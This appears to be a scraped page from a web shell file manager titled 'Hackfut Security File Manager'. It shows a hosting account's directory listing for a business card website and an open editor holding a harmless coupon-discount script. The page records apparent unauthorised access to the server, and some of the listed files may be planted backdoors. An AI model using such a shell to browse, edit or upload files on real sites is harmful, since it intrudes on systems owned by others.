Hackfut Security File Manager
Current Path:
/home/u126195517/domains/rddvc.com/public_html
home
/
u126195517
/
domains
/
rddvc.com
/
public_html
/
📁
..
📄
.htaccess
(217 B)
📁
PS_Creation1
📄
about.php
(8.03 KB)
📄
aboutdvc.php
(1.05 KB)
📄
ap-06Mar2026.txt
(15 B)
📄
banner.php
(2.07 KB)
📄
benifits.php
(4.57 KB)
📄
brochure_download_kriya.php
(715 B)
📄
cc.php
(15.7 KB)
📄
checkCoverImageSize.php
(790 B)
📄
checkLogoImageSize.php
(785 B)
📄
checkPayProofImageSize.php
(804 B)
📄
check_availability.php
(1011 B)
📄
contact.php
(2.53 KB)
📄
contact_form.php
(3.43 KB)
📄
copyright.php
(834 B)
📁
css
📁
cssphp
📄
diamond.php
(27.44 KB)
📄
digital_visiting_card.php
(2.7 KB)
📄
disp_pln_amt.js
(454 B)
📄
dom.txt
(1 B)
📄
dvc_design.php
(3.01 KB)
📄
dvc_design_form.php
(7.08 KB)
📄
dvc_design_function.php
(10.09 KB)
📄
dvc_design_gold.php
(4.37 KB)
📄
enquiry_form.php
(2.06 KB)
📄
features.php
(3.32 KB)
📄
final_payment.php
(6.34 KB)
📄
final_payment_form.php
(1.22 KB)
📁
fonts
📄
footer.php
(3.86 KB)
📄
get_discount_rate.php
(1.26 KB)
📄
get_plan_amount.php
(1.06 KB)
📄
gold.php
(18.48 KB)
📄
google028f325756238b38.html
(53 B)
📄
googledbda1fce9a3128a0.html
(53 B)
📄
header.php
(1.74 KB)
📁
images
📄
index.php
(4.11 KB)
📄
js.php
(224.41 KB)
📄
loader.php
(20.86 KB)
📄
login.php
(2.35 KB)
📄
login_form.php
(2.75 KB)
📁
members
📄
name_availability.js
(338 B)
📄
newsletter.php
(841 B)
📁
offline
📄
offline_cards.php
(2.89 KB)
📄
onetwothree3.php
(177.99 KB)
📄
online_cards.php
(1.1 KB)
📄
payment-failed.php
(96 B)
📄
payment-success.php
(1.01 KB)
📄
payment_checkout_kriya.php
(3.7 KB)
📄
price.php
(8.44 KB)
📄
privacypolicy.php
(9.28 KB)
📄
process_success.php
(2.71 KB)
📄
processoutput.php
(2.73 KB)
📄
redeemcoupon.js
(1.9 KB)
📄
robots.txt
(63 B)
📄
select_design.php
(1.45 KB)
📄
send_contactus_email.php
(1.33 KB)
📁
shop
📄
termsandconditions.php
(211.74 KB)
📄
testimonials.php
(3.37 KB)
📄
trycode_1.php
(354 B)
📄
v3.php
(20.86 KB)
📁
wp-admin
📁
wp-content
📁
wp-includes
Editing: redeemcoupon.js
function calculateDiscount() { var baseAmount = $("#payableamt").val(); var discountName = $("#copncode").val(); // Check if baseAmount and discountName are not empty before making the AJAX request if (baseAmount !== '' && discountName !== '') { $.ajax({ type: "POST", url: "get_discount_rate.php", data: { baseAmount: baseAmount, discountName: discountName }, success: function(result) { // Validate if the result is a valid number before updating the value if (!isNaN(result)) { $("#payableamt").val(result); // Disable the redeem button after successful execution $("#redeemButton").prop("disabled", true); // Display a success message console.log("Discount applied successfully!"); alert("Discount applied successfully!"); } else { console.error("Invalid discount rate received: " + result); // Display an error message console.log("Invalid discount rate received: " + result); alert("Invalid discount rate received: " + result); } }, error: function(jqXHR, textStatus, errorThrown) { console.error("AJAX request failed: " + textStatus, errorThrown); // Display an error message console.log("AJAX request failed: " + textStatus + ", " + errorThrown); alert("AJAX request failed: " + textStatus + ", " + errorThrown); } }); } else { console.error("Invalid baseAmount or discountName"); // Display an error message console.log("Invalid baseAmount or discountName"); alert("Invalid baseAmount or discountName"); } }
Upload File
Create Folder